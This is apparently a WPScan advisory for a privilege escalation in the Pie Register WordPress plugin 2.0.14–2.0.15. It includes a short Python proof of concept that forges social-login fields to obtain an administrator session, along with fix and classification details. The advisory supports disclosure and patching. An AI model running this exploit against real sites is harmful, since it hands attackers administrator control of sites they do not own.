Pie Register 2.0.14-2.0.15 - Privilege Escalation

Sign up to our free email alerts service for instant vulnerability notifications!

Description
User input is not validated correctly when accepting a login request via the Pie Register plugin. It is possible to manipulate posted variables in order to login using an arbitrary User ID (such as 1, for the default Administrative account).
Proof of Concept
import requests

target="http://localhost"
payload = {
        "log":"a",
        "pwd":"a",
        "social_site":"true",
        "user_id_social_site":1

}
r = requests.post(target, data=payload, allow_redirects=False)
print requests.utils.dict_from_cookiejar(r.cookies)

Affects

Plugin pie-register
fixed in version 2.0.16

References

URL https://research.g0blin.co.uk/g0blin-00041/

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 146
Verified No
WPVDB ID 7959

Timeline

Publicly Published 2015-05-04 (over 1 year ago)
Added 2015-05-04 (over 1 year ago)
Last Updated 2015-07-04 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.